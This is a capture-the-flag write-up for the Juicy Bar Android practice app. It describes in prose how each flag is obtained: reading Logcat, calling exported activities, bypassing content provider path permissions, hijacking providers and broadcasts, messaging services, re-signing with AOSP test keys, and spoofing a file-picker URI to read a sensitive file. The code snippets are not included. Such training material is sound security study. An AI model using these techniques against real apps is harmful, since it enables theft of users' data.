Juicy Bar CTF - Tools and APIs
In this post, we’ll walk through the solutions for all Tools and APIs solutions.
Captain’s Log
1 - Description
2 - Obtaining Flag
The first question was the easiest. Logging was left enabled, so when I opened the activity, I could see the flag directly in Logcat.
Time Travel
1 - Description
2 - Obtaining Flag
The Time Travel challenge requires us to change the device’s date and time. By reversing the APK using JADX, we can find the expected timestamp. Once we set the correct date and time, the flag is revealed.
Export Duty
1 - Description
2 - Obtaining Flag
The Export Duty challenge was straightforward, we just needed to call the exported target activity to retrieve the flag.
Content Providers
1 - Description
To query the content provider, we first needed to add the appropriate
2 - Obtaining 1st Flag
The first flag in the Content Providers challenge was easy to obtain—simply querying the provider was enough to retrieve it.
3 - Obtaining 2nd Flag
The second flag was protected by path permissions, so I slightly modified the code to bypass the restriction and successfully retrieved the flag.
4 - Obtaining 3rd Flag
The third flag involved hijacking a content provider. I wrote a script to mimic the provider, and when the target attempted to insert the flag, my script successfully captured it.
Juicy Broadcasts
1 - Description
2 - Obtaining 1st Flag
The first Broadcast Receivers challenge was straightforward: set the correct action and data, send the broadcast, and receive the flag.
3 - Obtaining 2nd Flag
The second challenge was a bit trickier. It required sending an sendOrderedBroadcast with resultExtras that included a Boolean value.
4 - Obtaining 3rd Flag
The third flag was obtained by creating a fake receiver with the intended action, which allowed me to capture the flag.
At Your Service
1 - Description
2 - Obtaining 1st Flag
The first Service challenge was tough. I created a message handler and sent a message with the specific what value to get the flag.
3 - Obtaining 2nd Flag
The second challenge was even harder. I set the replyTo value to receive a response from the target’s message handler and extracted the flag from the extra data.
Sign Here
1 - Description
2 - Obtaining Flag
The Sign Here challenge was very difficult. When I tried to access the content provider, I got an error saying I needed to sign the app with the correct key. After checking the hints, I discovered the APK was signed with a test key commonly found on AOSP. I then exported the APK, re-signed it using apksigner with the test keys, and was finally able to access the provider and retrieve the flag.
Data Exfiltration
1 - Description
2 - Obtaining Flag
The final challenge, Data Exfiltration, was the hardest. The app had a “Share File” feature that launched a file picker, listing applications like the Gallery. To exploit this, I needed to fake a file picker and trick the app into reading a sensitive file. I defined a custom activity in my manifest to act as a file picker:
Then, in PickerActivity, I crafted a fake URI pointing to the target file:
When I selected my app from the file picker list, it returned the malicious URI. The vulnerable app then attempted to read the file at that location—revealing the flag.